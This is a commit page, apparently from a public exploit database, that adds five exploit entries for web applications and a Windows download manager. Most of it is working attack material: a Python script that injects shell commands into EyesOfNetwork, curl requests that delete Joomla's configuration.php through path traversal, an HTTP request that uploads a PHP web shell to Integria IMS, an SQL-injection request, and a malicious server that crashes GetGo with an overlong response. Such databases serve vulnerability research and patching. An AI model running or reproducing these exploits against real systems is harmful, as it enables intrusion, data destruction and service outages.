Skip to content

Commit 2c0d2ff

Browse files
author
Offensive Security
committed
DB: 2019-08-17
5 changes to exploits/shellcodes GetGo Download Manager 6.2.2.3300 - Denial of Service EyesOfNetwork 5.1 - Authenticated Remote Command Execution Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion Integria IMS 5.0.86 - Arbitrary File Upload Web Wiz Forums 12.01 - 'PF' SQL Injection
1 parent ab63879 commit 2c0d2ff

6 files changed

Lines changed: 284 additions & 0 deletions

File tree

exploits/asp/webapps/47284.txt

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
2+
# Date: 2019-09-16
3+
# Exploit Author: n1x_ [MS-WEB]
4+
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
5+
# Version: 12.01
6+
# Tested on Windows
7+
8+
# Vulnerable parameter: PF (member_profile.asp)
9+
# GET Request
10+
11+
GET /member_profile.asp?PF=10' HTTP/1.1
12+
Host: host
13+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
14+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
15+
Accept-Language: en-US,en;q=0.5
16+
Accept-Encoding: gzip, deflate
17+
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
18+
Connection: close
19+
Upgrade-Insecure-Requests: 1

exploits/php/webapps/47280.py

Lines changed: 77 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
2+
# Google Dork: N/A
3+
# Date: 2019-08-14
4+
# Exploit Author: Nassim Asrir
5+
# Vendor Homepage: https://www.eyesofnetwork.com/
6+
# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
7+
# Version: 5.1 < 5.0
8+
# Tested on: Windows 10
9+
# CVE : N/A
10+
11+
#About The Product:
12+
13+
''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application.
14+
EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance.
15+
EyesOfNetwork Supervision provides event management, availability, problems and capacity.
16+
#Technical Analysis:
17+
EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
18+
By looking into tools/snmpwalk.php we will find the vulnerable part of code:
19+
else{
20+
$command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
21+
}
22+
in this line we can see as the attacker who control the value of "$host_name" variable .
23+
And after that we have the magic function "popen" in the next part of code.
24+
$handle = popen($command,'r');
25+
echo "<p>";<br />
26+
while($read = fread($handle,100)){
27+
echo nl2br($read);
28+
flush();
29+
}
30+
pclose($handle);
31+
And now we can see the use of "popen" function that execute the $command's value and if we set a shell metacharacters ";" in the end of the command we will be able to execute OS command.'''
32+
33+
#Exploit
34+
35+
import requests
36+
import optparse
37+
import sys
38+
import bs4 as bs
39+
40+
commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
41+
commandList.add_option('-t', '--target', action="store",
42+
help="Insert TARGET URL",
43+
)
44+
commandList.add_option('-c', '--cmd', action="store",
45+
help="Insert command name",
46+
)
47+
commandList.add_option('-u', '--user', action="store",
48+
help="Insert username",
49+
)
50+
commandList.add_option('-p', '--pwd', action="store",
51+
help="Insert password",
52+
)
53+
options, remainder = commandList.parse_args()
54+
55+
if not options.target or not options.cmd or not options.user or not options.pwd:
56+
57+
commandList.print_help()
58+
sys.exit(1)
59+
60+
61+
url = options.target
62+
cmd = options.cmd
63+
user = options.user
64+
pwd = options.pwd
65+
66+
with requests.session() as c:
67+
link=url
68+
initial=c.get(link)
69+
login_data={"login":user,"mdp":pwd}
70+
page_login=c.post(str(link)+"/login.php", data=login_data)
71+
v_url=link+"/module/tool_all/select_tool.php"
72+
v_data = {"page": "bylistbox", "host_list": "127.0.0.1;"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''}
73+
page_v=c.post(v_url, data=v_data)
74+
my=bs.BeautifulSoup(page_v.content, "lxml")
75+
for textarea in my.find_all('p'):
76+
final = textarea.get_text()
77+
print final

exploits/php/webapps/47281.txt

Lines changed: 99 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,99 @@
1+
# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
2+
# Dork: inurl:"index.php?option=com_jsjobs"
3+
# Date: 2019-08-16
4+
# Exploit Author: qw3rTyTy
5+
# Vendor Homepage: https://www.joomsky.com/
6+
# Software Link: https://www.joomsky.com/5/download/1
7+
# Version: 1.2.6
8+
# Tested on: Debian/nginx/joomla 3.9.0
9+
10+
# Vulnerability details:
11+
# This vulnerability is caused when processing custom userfield.
12+
13+
File: site/models/job.php
14+
Function: storeJob
15+
Line: 1240
16+
-------------------------------------
17+
18+
1215 //custom field code start
19+
1216 $customflagforadd = false;
20+
1217 $customflagfordelete = false;
21+
1218 $custom_field_namesforadd = array();
22+
1219 $custom_field_namesfordelete = array();
23+
1220 $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
24+
1221 $params = array();
25+
1222 $forfordelete = '';
26+
1223
27+
1224 foreach ($userfield AS $ufobj) {
28+
1225 $vardata = '';
29+
1226 if($ufobj->userfieldtype == 'file'){
30+
1227 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
31+
1228 $vardata = $data[$ufobj->field.'_2'];
32+
1229 }else{
33+
1230 $vardata = $_FILES[$ufobj->field]['name'];
34+
1231 }
35+
1232 $customflagforadd=true;
36+
1233 $custom_field_namesforadd[]=$ufobj->field;
37+
1234 }else{
38+
1235 $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
39+
1236 }
40+
1237 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
41+
1238 $customflagfordelete = true;
42+
1239 $forfordelete = $ufobj->field;
43+
1240 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check.
44+
1241 }
45+
...snip...
46+
1323 // new
47+
1324 //removing custom field
48+
1325 if($customflagfordelete == true){
49+
1326 foreach ($custom_field_namesfordelete as $key) {
50+
1327 $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!!
51+
1328 }
52+
1329 }
53+
54+
File: site/models/common.php
55+
Function: uploadOrDeleteFileCustom
56+
Line: 851
57+
-------------------------------------
58+
59+
748 $path = $base . '/' . $datadirectory;
60+
749 if (!file_exists($path)) { // create user directory
61+
750 $this->makeDir($path);
62+
751 }
63+
752 $isupload = false;
64+
753 $path = $path . '/data';
65+
754 if (!file_exists($path)) { // create user directory
66+
755 $this->makeDir($path);
67+
756 }
68+
757 if($for == 3 )
69+
758 $path = $path . '/jobseeker';
70+
759 else
71+
760 $path = $path . '/employer';
72+
761
73+
762 if (!file_exists($path)) { // create user directory
74+
763 $this->makeDir($path);
75+
764 }
76+
...snip...
77+
843 } else { // DELETE FILES
78+
844 if ($isdeletefile == 1) {
79+
845 if($for == 3){
80+
846 $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
81+
847 }else{
82+
848 $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
83+
849 }
84+
850 $file = $userpath.$field;
85+
851 unlink($file); //!!!
86+
852 }
87+
853 return 1;
88+
854 }
89+
855 }
90+
91+
#####################################
92+
#PoC:
93+
#####################################
94+
95+
# If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests.
96+
97+
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"
98+
99+
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"

exploits/php/webapps/47283.txt

Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
# Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload
2+
# Date: 2019-08-16
3+
# Exploit Author: Greg.Priest
4+
# Vendor Homepage: https://integriaims.com/
5+
# Software Link: https://sourceforge.net/projects/integria/files/5.0.86/
6+
# Version: Integria IMS 5.0.86
7+
# Tested on: Windows
8+
# CVE : N/A
9+
10+
# ---------------------------------------------------------------------------------------
11+
# http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
12+
# ---------------------------------------------------------------------------------------
13+
14+
# [Description]
15+
# filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload.
16+
# index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
17+
# ---------------------------------------------------------------------------------------
18+
19+
POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1
20+
Host: 10.61.184.30
21+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
22+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
23+
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
24+
Accept-Encoding: gzip, deflate
25+
Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
26+
Content-Type: multipart/form-data; boundary=---------------------------30333176734664
27+
Content-Length: 374
28+
Connection: close
29+
Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e
30+
Upgrade-Insecure-Requests: 1
31+
32+
-----------------------------30333176734664
33+
Content-Disposition: form-data; name="curdir"
34+
35+
36+
-----------------------------30333176734664
37+
Content-Disposition: form-data; name="file"; filename="whoami.php"
38+
Content-Type: application/octet-stream
39+
40+
<?php
41+
$output = shell_exec('whoami');
42+
echo "<pre>$output</pre>";
43+
?>
44+
45+
-----------------------------30333176734664--

exploits/windows_x86-64/dos/47282.txt

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
2+
# Date: 2019-08-15
3+
# Author - Malav Vyas
4+
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
5+
# Vendor Home Page: www.getgosoft.com
6+
# Software Link: http://www.getgosoft.com/getgodm/
7+
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
8+
# Attack Type : Remote
9+
# Impact : DoS
10+
# Co-author - Velayuthm Selvaraj
11+
12+
# 1. Description
13+
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and
14+
# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.
15+
16+
# 2. Proof of Concept
17+
18+
import socket
19+
from time import sleep
20+
host = "192.168.0.112"
21+
port = 80
22+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23+
sock.bind((host, port))
24+
sock.listen(1)
25+
print "\n[+] Listening on %d ..." % port
26+
27+
cl, addr = sock.accept()
28+
print "[+] Connected to %s" % addr[0]
29+
evilbuffer = "A" * 6000
30+
31+
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"
32+
33+
print cl.recv(1000)
34+
cl.send(buffer)
35+
print "[+] Sending buffer: OK\n"
36+
37+
sleep(30)
38+
cl.close()
39+
sock.close()

files_exploits.csv

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6549,6 +6549,7 @@ id,file,description,date,author,type,platform,port
65496549
47277,exploits/windows/dos/47277.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
65506550
47278,exploits/windows/dos/47278.txt,"Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-08-15,"Google Security Research",dos,windows,
65516551
47279,exploits/windows/dos/47279.txt,"Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
6552+
47282,exploits/windows_x86-64/dos/47282.txt,"GetGo Download Manager 6.2.2.3300 - Denial of Service",2019-08-16,"Malav Vyas",dos,windows_x86-64,
65526553
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
65536554
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
65546555
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41641,3 +41642,7 @@ id,file,description,date,author,type,platform,port
4164141642
47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
4164241643
47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
4164341644
47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,
41645+
47280,exploits/php/webapps/47280.py,"EyesOfNetwork 5.1 - Authenticated Remote Command Execution",2019-08-16,"Nassim Asrir",webapps,php,
41646+
47281,exploits/php/webapps/47281.txt,"Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion",2019-08-16,qw3rTyTy,webapps,php,
41647+
47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php,
41648+
47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp,

0 commit comments

Comments
 (0)